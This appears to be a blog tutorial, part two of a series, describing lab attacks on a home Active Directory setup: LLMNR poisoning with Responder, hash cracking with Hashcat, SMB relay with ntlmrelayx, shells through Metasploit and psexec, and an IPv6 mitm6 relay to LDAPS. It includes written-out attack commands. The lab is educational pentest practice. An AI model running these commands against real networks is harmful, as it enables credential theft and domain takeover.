AD Attack Lab Part Two (LLMNR poisoning, SMB relay, and IPv6 attack)

Arthur Reeder

In part two of the AD attack lab series, we will learn how to perform LLMNR poisoning, SMB relay, and IPv6 attack against the AD environment. If you do not have the AD environment set up yet, you can go to the “AD attack lab part one” and follow the instruction to set the lab up. Note, I have changed my VMs spec in this lab. Currently, there are 4 VMs, they are Windows Server 2019, Windows 10 (2x), and Kali 2020.3. Each VMs assigned with 1 GB RAM and 1 Processor, and they all use the NAT network. If you do not have Kali installed yet, head over here to grab the latest version of Kali. Now, let’s dive into the lab setup.

Install Impacket

wget https://bootstrap.pypa.io/get-pip.py sudo python get-pip.py wget https://github.com/SecureAuthCorp/impacket/releases/download/impacket_0_9_19/impacket-0.9.19.tar.gz Extract the downloaded folder cd impacket/ pip install . sudo pip install .

Note, we will use Impacket 0.9.19 in this lab because of the compatible issue for some tools we are going to use. Also. notice that the Python2.7 is being used to install the pip so we will have the pip to use Python2.7.

Perform LLMNR poisoning

Start all the 4 VMs. In kali, start the “Responder” and use the eth0 in this case with a Verbose mode. In one of the Windows 10 client, log in and try to access the Kali machine from the network drive. Note, this is for the demonstration purpose that someone in the network typed in a wrong network drive, and Responder now responds to this wrong DNS request. Essentially, the Responder tells the machine that it is the legit DNS server and asks the Windows 10 machine to send the hash to it. Note, 192.168.200.160 is the IP of Kali.

  • Start the Responder

sudo responder -I eth0 -rdwv

  • Access our kali machine network drive from Windows 10

Note, if your computers not visible in the network, you need to go to “Services” and turn on “Function Discover Resource Publication”.

  • Save the hash in a file, and use “Rockyou” and “Hashcat” to crack the hash

We see the Administrator’s password is “password”.

SMB relay

  • Do a Nmap scan to see if the SMB signing is enforced

sudo nmap --script=smb2-security-mode.nse -p445 192.168.200.0/24

  • Turn off SMB and HTTP servers in the Responder configuration file
  • Start the Responder and “ntlmrelayx.py” in the Kail machine

Now, the received hash is being relayed to the target and used to dump the local hashes on the machine.

Shell Access via SMB relay

We can access the different shares in the shell includes C$ and ADMIN$

  • Obtain a shell via Metasploit

Use the following module and set the variables as the following image shows:

  • Obtain a shell via “psexec.py”

IPv6 Attack via MITM6

  • Install mitm6

Note, the image shows I used Python3 but I changed to Python2.7 later.

  • Install the LDAPS Certificate on server

Note, if you can not connect to the LDAPS, try troubleshooting. I have to roll back to the previous snapshot early and re-install the CA role because for some reason my LDAPS wasn’t installed for the first time.

  • Start the “mitm6” and “ntlmrelayx.py” at the same time.

mitm6 -d kudos.local sudo ntlmrelayx.py -6 -t ldaps://192.168.200.153 -wh fakewpad.kudos.local -l lootme

In this post, we learned how to use LLMNR poisoning, SMB relay, and IPv6 attack to against the misconfigured AD environment. In the following posts, I will continue to discuss other ways to enumerate and attack the AD environment. Thank you for reading :)

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store